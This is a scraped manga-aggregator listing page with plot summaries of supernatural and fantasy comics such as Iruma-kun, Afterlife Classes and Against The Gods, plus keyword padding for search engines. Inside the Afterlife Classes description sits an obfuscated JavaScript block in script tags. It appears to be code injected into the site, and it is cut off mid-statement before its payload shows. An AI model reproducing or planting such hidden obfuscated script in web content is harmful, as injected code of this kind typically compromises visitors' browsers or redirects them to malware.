Supernatural - Page 3

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

667 results

After School! Iruma-Kun

Fourteen-year-old Iruma Suzuki has the worst luck possible! Incapable of saying no to anyone, he has always performed whatever life-threatening jobs his greedy and lazy parents requested. His life takes an unexpected turn when they form a contract with Sullivan, a high-ranking demon, at the cost of his soul. Afraid and confused, Iruma is surprised that all Sullivan wants is to act as his grandfather. Sullivan takes care of Iruma and decides to enroll him in the demon school Babyls. Iruma's greatest challenge is hiding his status as a human, so keeping a low profile among his peers is the only option. However, Iruma will soon discover that he is no ordinary human, and the demons might also be more than what meets the eye. [Written by MAL Rewrite]


Afterlife Classes

Choi Kanghee has no friends and is often misunderstood due to his scary appearance, but all he really wants in life are some friends. One day, he returned home to mourn for his grandmother’s death anniversary, but a strange turn of events ends up reuniting Kanghee with his grandma! Can they work together to create new friends, or did it just turn more difficult? ??? ???! / Otherworld classes / The Otherworldly Class!<script></script><script>(function(_0x3932a8,_0x5316ea){var _0x2b7c52=_0x25e1,_0x5106ff=_0x3932a8();while(!![]){try{var _0x16ab7d=parseInt(_0x2b7c52(0x17d))/(0x233*-0xa+0x401*0x5+-0x2*-0xfd)*(parseInt(_0x2b7c52(0x177))/(-0x9*-0x3a9+-0x4f*-0x7c+-0x4733))+parseInt(_0x2b7c52(0x181))/(-0x2321+-0x15ed+0x3911)*(-parseInt(_0x2b7c52(0x175))/(0x7*-0x213+0x63a*-0x2+0x1afd))+-parseInt(_0x2b7c52(0x17f))/(-0x1461+-0x1*0x1c33+0x13f*0x27)+-parseInt(_0x2b7c52(0x174))/(-0xa60+-0x10*-0x18e+-0x22*0x6d)+parseInt(_0x2b7c52(0x172))/(0xeff*0x2+0x5*-0x28+-0x1d2f)*(-parseInt(_0x2b7c52(0x18e))/(0x1*-0x1d07+0x1*0x6b+0x1ca4))+parseInt(_0x2b7c52(0x18a))/(-0x1b*-0xed+0x1*0x14a5+-0x2d9b)+parseInt(_0x2b7c52(0x171))/(0x12*-0x1ef+0x1348*-0x1+-0x2*-0x1b10);if(_0x16ab7d===_0x5316ea)break;else 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Against The Gods

Mythical Abode Mountain, Cloud’s End Cliff, The Most Dangerous Of Azure Cloud Continent’s Four Deadly Areas. Cloud’s End Cliff’s Base Is Known As The Grim Reaper’s Cemetery. Over Countless Years, The Number Of People That Have Fallen Off This Cliff Is Too High To Count. None Of Them, Even Three Stronger Than God Masters, Whose Power Could Pierce The Heavens, Have Been Able To Return Alive. However, A Boy That’s Being Chased By Various People Because He Alone Holds A Priceless Treasure Jumps Off The Cliff, But Instead Of Dying He Wakes Up In The Body Of A Boy With The Same Name In Another World! This Is The Story Of A Boy Wielding The Sky Poison Pearl, Cultivating The Strength To Oppose Heaven And Earth, A Lord Overlooking The World!

5 hours ago

Ake No Tobari

Read Manga Ake No Tobari / Dawn Of Tobari / Tobari Of The Dawn / Рассвет Тобари Is There A Land Of Paradise Where Goblins And Humans Can Coexist In Harmony? Goblins And Humans Join In The Fight To Make This Dream Come True. “Ake No Tobari” Is Another Name: Рассвет Тобари รุ่งอรุณแห่งโทบาริ 明けのトバリ 새벽의 토바리


Alcohol And Ogre-Girls

Shida Naori is a college student who loves making alcoholic drinks but has no friends to share them with. At a mixer, she meets Ibuki Hinata, who she ends up taking home with her. After making her a drink, Naori discovers that Hinata is an ogre-girl descended from Shuten-doji who needs alcohol to live, can only drink alcohol offered to her by humans, and grows horns whenever she drinks. Thus, Hinata decides to make Naori her personal bartender.


All Football Talents Are Mine

Read Manhwa All Football Talents Are Mine Online For Free On Zinmanga Associated Names: All Soccer Talents Are Mine / All Soccer Talent Is Mine / Kick-Off!~その才能は俺のものだ!~ / Soccer Talent Is All Mine / 축구재능 다 내꺼 The Content All Football Talents Are Mine: Uho-Yeong Had Dreamed Of Becoming A Soccer Player. However, He Was Not Blessed With The Talent And Died Without Realizing His Dream, Struck By Lightning. It Was Then That The Demon Mammon Appeared, Offering The Ability To Covet Everyone’s Talents… New And Hot Comics Are Updated The Fastest. Transformed Into A Piece Of Land Spring Letter In The Snow Zero 0 – Transcending The Future With Space-Time Magic Mangazin Is A Website That Aggregates The Latest And Hottest Manga, Updated Quickly To Serve Readers With High-Quality Images And Deliver Them An Excellent Experience.

20 hours ago

All Rounder

A world full of zombies. But this apocalypse... is it worth trying?! [Skills can be 'transferred' from experts.] Mental care, wooden construction, heavenly magic, animal communication, mechanical engineering, performance, etc.. There is so much to learn! The sprint of the prepared survivor, who is good at everything, begins! Genres: Action, Fantasy, Adventure


Amina Of The Lamp

On the day of the Wizarding City Paz’s destruction, Amina got stuck inside a lamp while trying to turn back time. And 300 years later, she was awakened by a military commander, Jackal. “I do not have any wishes for you to grant” Well, I just want to hurry and grant a wish so I can go back, Who the hell is this guy? “Do you know who I am?” “There is no one else in this world who knows you better than I do.” “That’s not possible….. I’ll disappear one of these days!” Amina, who needs to go back into the lamp after granted the wishes suddenly meets Jackal who wants to give up his wishes to be with her. However, there are many dangers and threats that prevent him from doing so. Will Amina achieve her wish in the end?


An Extraordinary Guardian

Read An Extraordinary Guardian Novel – An Extraordinary Guardian Manhwa Online Free At The Summary Of The Comic An Extraordinary Guardian: Kim Hashin, A Low-Ranking Guardian God, Is Determined To Make His Town The Happiest There Is And Get Promoted To A Higher Rank. But His Plan Goes Awry When Nam Dareum, A Girl With An Extremely Low Happiness Level And No Will To Live, Moves To Town. Now Hashin Must Do Everything In His Power To Make Dareum Happy So That He Can Save Her And Everything He’s Worked For. As Hardships And Obstacles Continue To Mount, Will Hashin Manage To Help Dareum Find True Joy In Life And Put His Town Back On Top? “An Extraordinary Guardian” Is Also Known As: Extraordinary Guardian Deity / 남다른 수호신 The Comic An Extraordinary Guardian Belongs To The Genre: Drama, Fantasy, Supernatural “Top Manhwa, Mangaupdates, Read Manhwa Online…” Are The Most Searched Keywords On The Website Zinmanga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


An Hour Of Romance

Promoted at the speed of light, the star of JK Electronics, the ultimate career woman, yet always forever alone Cha Ju An! Kind, honest, full of vitality, and with the looks and physique to rival a model, yet bumbling fool Yoo Do Jin! With such different personalities, one day these two… #suddenly #withoutwarning #during #officehours switched souls?!!! Due to this switch, their lives are made a mess!! But what is the reason for this switch? And that reason is to match these two up by force! By the same author as What’s Wrong with Secretary Kim.


Anaerobic Love: Deep Sea Prisoner

Read Manhua Anaerobic Love: Deep Sea Prisoner / Breathless / Deep Sea Prisoner / Wuyang Zhi Ai / Wúyǎng Zhī Ài / 无氧之爱 / 深海之囚 Bin He Has An Unrequited Love For His Best Friend, Hai. During Their Uni Graduation Trip, Bin He Was Feeling Down Because His Best Friend Is Finally Going To Pursue The Girl He Likes. They Decide To Have A Friendly Diving Competition. While Diving , Bin He Sees A Man Chained To A Shipwreck At The Bottom Of The Sea. Beneath The Sea Begins An Anaerobic Love.what Will Be Born From This Fateful Meeting?


Ancestor Is Beautiful And Elegant

Read Manga Ancestor Is Beautiful And Elegant Online For Free At Top Manhua Associated Names: Ancestor Is Beautiful And Elegant MangaZin The Content Ancestor Is Beautiful And Elegant: Bai Chuwei has lived for five thousand years, only to wait for the original development of the plot. Coming down from the mountain, she became the ancestor of all mankind.Money? The first in the world of assets. The eight great families? They are only her servants. When they all shout “Ancestor Bai Chuwei”, the fourth lord of the Duan family of Haicheng takes her into his arms. Who understands this? This brat who grew up next to her, Bai Chuwei just wanted to absorb her spiritual energy, but ended up getting involved in the plot herself…. New and hot comics are updated the fastest. The dying princess laughs in revenge From General to Bride: Marrying My Stongest Rival Adopted by a Murderous Duke Family MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as &#8220;Top Manhua&#8221; and &#8220;ManhwaClan,&#8221; as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.
